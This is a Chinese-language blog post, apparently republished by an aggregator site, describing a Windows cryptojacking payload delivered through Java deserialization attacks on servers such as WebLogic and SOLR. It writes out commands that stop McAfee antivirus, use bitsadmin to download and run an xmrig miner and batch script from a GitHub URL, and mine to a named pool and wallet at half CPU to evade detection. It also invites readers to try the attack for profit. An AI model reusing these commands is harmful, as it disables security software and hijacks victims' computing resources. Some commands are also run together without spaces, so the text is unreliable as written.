最近，安全社區(qū)中有很多人都在討論如何利用Java反序列化漏洞來(lái)攻擊類似Apache、SOLR和WebLogic之類的系統(tǒng)。不說(shuō)廢話，我們直接進(jìn)入正題。目前絕大多數(shù)的此類攻擊針對(duì)的都是Linux/Unix系統(tǒng)，但是我近期發(fā)現(xiàn)了一種針對(duì)Windows系統(tǒng)的攻擊方法。

PS：本文僅用于技術(shù)討論與分享，嚴(yán)禁用于非法用途

攻擊代碼如下：

cmd/cnet stop"McAfee McShield;net stop mcafeeframework;bitsadmin.exe /transfer"xmrig.bat" /download /priority foregroundhttp://raw.githubusercontent.com/sirikun/starships/master/xmrig.bat"%cd%\xmrig.bat";bitsadmin.exe /transfer "xmrig.exe"/download /priority foregroundhttp://raw.githubusercontent.com/sirikun/starships/master/xmrig.exe"%cd%\xmrig.exe;dir xmrig*;xmrig.bat;tasklist;

實(shí)際的Payload分析

關(guān)閉McAfee反病毒軟件（我不明白社區(qū)中的這種技術(shù)為啥只關(guān)掉McAfee…）：

netstop "McAfee McShield;netstop mcafeeframework;

使用bitsadmin從GitHub下載加密貨幣挖礦程序和一個(gè)batch腳本文件：

bitsadmin.exe/transfer "xmrig.bat" /download /priority foregroundhttp://raw.githubusercontent.com/sirikun/starships/master/xmrig.bat"%cd%\xmrig.bat";bitsadmin.exe/transfer "xmrig.exe" /download /priority foreground http://raw.githubusercontent.com/sirikun/starships/master/xmrig.exe"%cd%\xmrig.exe;dirxmrig*;xmrig.bat;tasklist;

Batch腳本文件代碼如下：

taskkill/im /f xmrig.exe /tnetstop "McAfee McShield"netstop mcafeeframeworkxmrig.exe-o http://monerohash.com:3333 -u 42jF56tc85UTZwhMQc6rHbMHTxHqK74qS2zqLyRZxLbwegsy7FJ9w4T5B69Ay5qeMEMuvVDwHNeopAxrEZkkHrMb5phovJ6-p x --background --max-cpu-usage=50 --donate-level=1

首先，上述代碼會(huì)終止其他xmrig進(jìn)程（可能是為了防止資源競(jìng)爭(zhēng)）。接下來(lái)，它會(huì)關(guān)閉McAfee。然后便會(huì)開(kāi)啟挖礦程序，并跟http://monerohash.com礦池（端口3333）進(jìn)行連接。它只會(huì)占用大約50%的CPU資源，估計(jì)是為了避免被檢測(cè)到吧。

目前為止，這個(gè)挖礦程序的計(jì)算能力只能實(shí)現(xiàn)350哈希每秒，并為我挖到了40個(gè)門(mén)羅幣（價(jià)值約為7000美元）。

感興趣的同學(xué)可以自己動(dòng)手試一試，說(shuō)不定會(huì)有一些意想不到的收獲。

總結(jié)

以上是生活随笔為你收集整理的利用Java反序列化漏洞在Windows上的挖矿实验的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。